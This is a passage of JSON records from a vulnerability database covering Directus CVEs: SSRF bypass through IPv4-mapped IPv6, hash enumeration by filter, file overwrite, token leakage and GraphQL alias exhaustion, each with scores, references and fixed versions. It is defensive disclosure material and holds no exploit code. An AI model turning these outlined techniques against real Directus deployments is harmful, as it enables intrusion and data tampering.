11.16.1.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35413","reference_id":"","reference_type":"","scores":[{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04912","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00018","scoring_system":"epss","scoring_elements":"0.04908","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35413"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35413","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35413"},{"reference_url":"https://github.com/advisories/GHSA-wxwm-3fxv-mrvx","reference_id":"GHSA-wxwm-3fxv-mrvx","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wxwm-3fxv-mrvx"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-wxwm-3fxv-mrvx","reference_id":"GHSA-wxwm-3fxv-mrvx","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-04-08T14:05:28Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-wxwm-3fxv-mrvx"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373399?format=json","purl":"pkg:npm/directus@11.16.1","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.1"}],"aliases":["CVE-2026-35413","GHSA-wxwm-3fxv-mrvx"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9dsr-kz3s-hkdx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/105805?format=json","vulnerability_id":"VCID-9r91-qgfa-x7ak","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Starting in version 9.12.0 and prior to version 11.9.0, Directus Flows with a manual trigger are not validating whether the user triggering the Flow has permissions to the items provided as payload to the Flow. Depending on what the Flow is set up to do this can lead to the Flow executing potential tasks on the attacker's behalf without authenticating. Bad actors could execute the manual trigger Flows without authentication, or access rights to the said collection(s) or item(s). Users with manual trigger Flows configured are impacted as these endpoints do not currently validate if the user has read access to `directus_flows` or to the relevant collection/items. The manual trigger Flows should have tighter security requirements as compared to webhook Flows where users are expected to perform do their own checks. Version 11.9.0 fixes the issue. As a workaround, implement permission checks for read access to Flows and read access to relevant collection/items.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53889","reference_id":"","reference_type":"","scores":[{"value":"0.00244","scoring_system":"epss","scoring_elements":"0.47989","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00244","scoring_system":"epss","scoring_elements":"0.48128","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-53889"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53889","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53889"},{"reference_url":"https://github.com/directus/directus/commit/22be460c76957708d67fdd52846a9ad1cbb083fb","reference_id":"22be460c76957708d67fdd52846a9ad1cbb083fb","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:43:29Z/"}],"url":"https://github.com/directus/directus/commit/22be460c76957708d67fdd52846a9ad1cbb083fb"},{"reference_url":"https://github.com/advisories/GHSA-7cvf-pxgp-42fc","reference_id":"GHSA-7cvf-pxgp-42fc","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-7cvf-pxgp-42fc"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-7cvf-pxgp-42fc","reference_id":"GHSA-7cvf-pxgp-42fc","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:43:29Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-7cvf-pxgp-42fc"},{"reference_url":"https://github.com/directus/directus/releases/tag/v11.9.0","reference_id":"v11.9.0","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2025-07-15T13:43:29Z/"}],"url":"https://github.com/directus/directus/releases/tag/v11.9.0"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/378353?format=json","purl":"pkg:npm/directus@11.9.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-8q3p-rrv2-jba5"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.9.0"}],"aliases":["CVE-2025-53889","GHSA-7cvf-pxgp-42fc"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9r91-qgfa-x7ak"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/145589?format=json","vulnerability_id":"VCID-9t8b-59vc-kbea","summary":"Directus is a real-time API and App dashboard for managing SQL database content. In versions prior to 9.16.0 users with read access to the `password` field in `directus_users` can extract the argon2 password hashes by brute forcing the export functionality combined with a `_starts_with` filter. This allows the user to enumerate the password hashes. Accounts cannot be taken over unless the hashes can be reversed which is unlikely with current hardware. This problem has been patched by preventing any hashed/concealed field to be filtered against with the `_starts_with` or other string operator in version 9.16.0. Users are advised to upgrade. Users unable to upgrade may mitigate this issue by ensuring that no user has `read` access to the `password` field in `directus_users`.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-27481","reference_id":"","reference_type":"","scores":[{"value":"0.00301","scoring_system":"epss","scoring_elements":"0.53838","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00301","scoring_system":"epss","scoring_elements":"0.53964","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-27481"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-27481","reference_id":"","reference_type":"","scores":[{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-27481"},{"reference_url":"https://github.com/directus/directus/pull/14829","reference_id":"14829","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:10Z/"}],"url":"https://github.com/directus/directus/pull/14829"},{"reference_url":"https://github.com/directus/directus/pull/15010","reference_id":"15010","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:10Z/"}],"url":"https://github.com/directus/directus/pull/15010"},{"reference_url":"https://github.com/advisories/GHSA-m5q3-8wgf-x8xf","reference_id":"GHSA-m5q3-8wgf-x8xf","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-m5q3-8wgf-x8xf"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-m5q3-8wgf-x8xf","reference_id":"GHSA-m5q3-8wgf-x8xf","reference_type":"","scores":[{"value":"4.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"},{"value":"6.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:10Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-m5q3-8wgf-x8xf"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/381015?format=json","purl":"pkg:npm/directus@9.16.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-b8ya-2bmn-e3h5"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-bsua-aktm-1qfd"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-eyv5-91cq-pyf9"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jvtg-cnnb-7ubg"},{"vulnerability":"VCID-jy2x-jbbb-zua5"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qeh1-cm33-93g1"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-s39d-aw92-hydh"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-t1by-h5au-rqbu"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u121-7x5t-3fcg"},{"vulnerability":"VCID-u4er-eddz-g7aq"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ua8h-tmak-hufd"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v2je-s9mk-e3h1"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.16.0"}],"aliases":["CVE-2023-27481","GHSA-m5q3-8wgf-x8xf"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-9t8b-59vc-kbea"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/73167?format=json","vulnerability_id":"VCID-a1y7-cmk1-4ffn","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, the PATCH /files/{id} endpoint accepts a user-controlled filename_disk parameter. By setting this value to match the storage path of another user's file, an attacker can overwrite that file's content while manipulating metadata fields such as uploaded_by to obscure the tampering. This vulnerability is fixed in 11.17.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39942","reference_id":"","reference_type":"","scores":[{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12266","published_at":"2026-06-11T12:55:00Z"},{"value":"0.0004","scoring_system":"epss","scoring_elements":"0.12358","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-39942"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39942","reference_id":"","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-39942"},{"reference_url":"https://github.com/advisories/GHSA-393c-p46r-7c95","reference_id":"GHSA-393c-p46r-7c95","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-393c-p46r-7c95"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-393c-p46r-7c95","reference_id":"GHSA-393c-p46r-7c95","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-09T17:47:33Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-393c-p46r-7c95"},{"reference_url":"https://github.com/directus/directus/releases/tag/v11.17.0","reference_id":"v11.17.0","reference_type":"","scores":[{"value":"8.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-09T17:47:33Z/"}],"url":"https://github.com/directus/directus/releases/tag/v11.17.0"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373752?format=json","purl":"pkg:npm/directus@11.17.0","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0"}],"aliases":["CVE-2026-39942","GHSA-393c-p46r-7c95"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-a1y7-cmk1-4ffn"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71560?format=json","vulnerability_id":"VCID-ah8z-vr21-wfd6","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.0, a Server-Side Request Forgery (SSRF) protection bypass has been identified and fixed in Directus. The IP address validation mechanism used to block requests to local and private networks could be circumvented using IPv4-Mapped IPv6 address notation. This vulnerability is fixed in 11.16.0.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35409","reference_id":"","reference_type":"","scores":[{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02712","published_at":"2026-06-12T12:55:00Z"},{"value":"0.00014","scoring_system":"epss","scoring_elements":"0.02707","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35409"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35409","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35409"},{"reference_url":"https://github.com/advisories/GHSA-wv3h-5fx7-966h","reference_id":"GHSA-wv3h-5fx7-966h","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-wv3h-5fx7-966h"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-wv3h-5fx7-966h","reference_id":"GHSA-wv3h-5fx7-966h","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-08T14:04:19Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-wv3h-5fx7-966h"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/373510?format=json","purl":"pkg:npm/directus@11.16.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.0"}],"aliases":["CVE-2026-35409","GHSA-wv3h-5fx7-966h"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ah8z-vr21-wfd6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/134660?format=json","vulnerability_id":"VCID-b8ya-2bmn-e3h5","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 9.23.3, the `directus_refresh_token` is not redacted properly from the log outputs and can be used to impersonate users without their permission. This issue is patched in version 9.23.3.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2023-28443","reference_id":"","reference_type":"","scores":[{"value":"0.00061","scoring_system":"epss","scoring_elements":"0.19287","published_at":"2026-06-11T12:55:00Z"},{"value":"0.00061","scoring_system":"epss","scoring_elements":"0.19457","published_at":"2026-06-12T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2023-28443"},{"reference_url":"https://github.com/directus/directus","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/directus/directus"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2023-28443","reference_id":"","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2023-28443"},{"reference_url":"https://github.com/directus/directus/commit/349536303983ccba68ecb3e4fb35315424011afc","reference_id":"349536303983ccba68ecb3e4fb35315424011afc","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-21T15:28:44Z/"}],"url":"https://github.com/directus/directus/commit/349536303983ccba68ecb3e4fb35315424011afc"},{"reference_url":"https://github.com/advisories/GHSA-8vg2-wf3q-mwv7","reference_id":"GHSA-8vg2-wf3q-mwv7","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-8vg2-wf3q-mwv7"},{"reference_url":"https://github.com/directus/directus/security/advisories/GHSA-8vg2-wf3q-mwv7","reference_id":"GHSA-8vg2-wf3q-mwv7","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-21T15:28:44Z/"}],"url":"https://github.com/directus/directus/security/advisories/GHSA-8vg2-wf3q-mwv7"},{"reference_url":"https://github.com/directus/directus/blob/7c479c5161639aac466c763b6b958a9524201d74/api/src/logger.ts#L13","reference_id":"logger.ts#L13","reference_type":"","scores":[{"value":"4.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-21T15:28:44Z/"}],"url":"https://github.com/directus/directus/blob/7c479c5161639aac466c763b6b958a9524201d74/api/src/logger.ts#L13"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/380863?format=json","purl":"pkg:npm/directus@9.23.3","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-32e6-c1bv-efea"},{"vulnerability":"VCID-45yr-y58u-aqb8"},{"vulnerability":"VCID-4z1u-rtza-83bj"},{"vulnerability":"VCID-54ja-4vrx-tbgm"},{"vulnerability":"VCID-79ch-vtkp-q3cd"},{"vulnerability":"VCID-9dsr-kz3s-hkdx"},{"vulnerability":"VCID-9r91-qgfa-x7ak"},{"vulnerability":"VCID-a1y7-cmk1-4ffn"},{"vulnerability":"VCID-ah8z-vr21-wfd6"},{"vulnerability":"VCID-bc42-4j4d-tudj"},{"vulnerability":"VCID-bg96-h5bt-xfbb"},{"vulnerability":"VCID-c4eu-udp3-uuen"},{"vulnerability":"VCID-d8vm-nuff-uffc"},{"vulnerability":"VCID-dcw5-6ct3-b3ev"},{"vulnerability":"VCID-eyv5-91cq-pyf9"},{"vulnerability":"VCID-f3pv-2cf5-3bg8"},{"vulnerability":"VCID-ga3s-595f-2keq"},{"vulnerability":"VCID-gf4m-ad8j-7bbn"},{"vulnerability":"VCID-jvtg-cnnb-7ubg"},{"vulnerability":"VCID-jy2x-jbbb-zua5"},{"vulnerability":"VCID-pvfa-xp3e-8kg2"},{"vulnerability":"VCID-qeh1-cm33-93g1"},{"vulnerability":"VCID-qfnx-egwg-ybgp"},{"vulnerability":"VCID-qrf3-cz1h-8kau"},{"vulnerability":"VCID-rdpb-7dcd-fyby"},{"vulnerability":"VCID-rren-vtar-23fm"},{"vulnerability":"VCID-s39d-aw92-hydh"},{"vulnerability":"VCID-snux-8b2e-9kd6"},{"vulnerability":"VCID-t1by-h5au-rqbu"},{"vulnerability":"VCID-tp8r-hnf7-fkaf"},{"vulnerability":"VCID-u4er-eddz-g7aq"},{"vulnerability":"VCID-u5hw-p46t-jybc"},{"vulnerability":"VCID-ua8h-tmak-hufd"},{"vulnerability":"VCID-ufth-uy5w-87fe"},{"vulnerability":"VCID-v2je-s9mk-e3h1"},{"vulnerability":"VCID-v6mk-ybv3-tyc8"},{"vulnerability":"VCID-v9s1-9n1m-bubs"},{"vulnerability":"VCID-y6cy-k9c2-pkcb"},{"vulnerability":"VCID-ywqb-qrvw-hfbh"},{"vulnerability":"VCID-z5ud-p9th-mff2"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.3"}],"aliases":["CVE-2023-28443","GHSA-8vg2-wf3q-mwv7"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-b8ya-2bmn-e3h5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71751?format=json","vulnerability_id":"VCID-bc42-4j4d-tudj","summary":"Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.17.0, Directus' GraphQL endpoints (/graphql and /graphql/system) did not deduplicate resolver invocations within a single request. An authenticated user could exploit GraphQL aliasing to repeat an expensive relational query many times in a single request, forcing the server to execute a large number of independent complex database queries concurrently, multiplying database load linearly with the number of aliases. The existing token limit on GraphQL queries still permitted enough aliases for significant resource exhaustion, while the relational depth limit applied per alias without reducing the total number executed. Rate limiting is disabled by default, meaning no built-in throttle prevented this from causing CPU, memory, and I/O exhaustion that could degrade or crash the service. Any authenticated user, including those with minimal read-only permissions, could trigger this condition. This vulnerability is fixed in 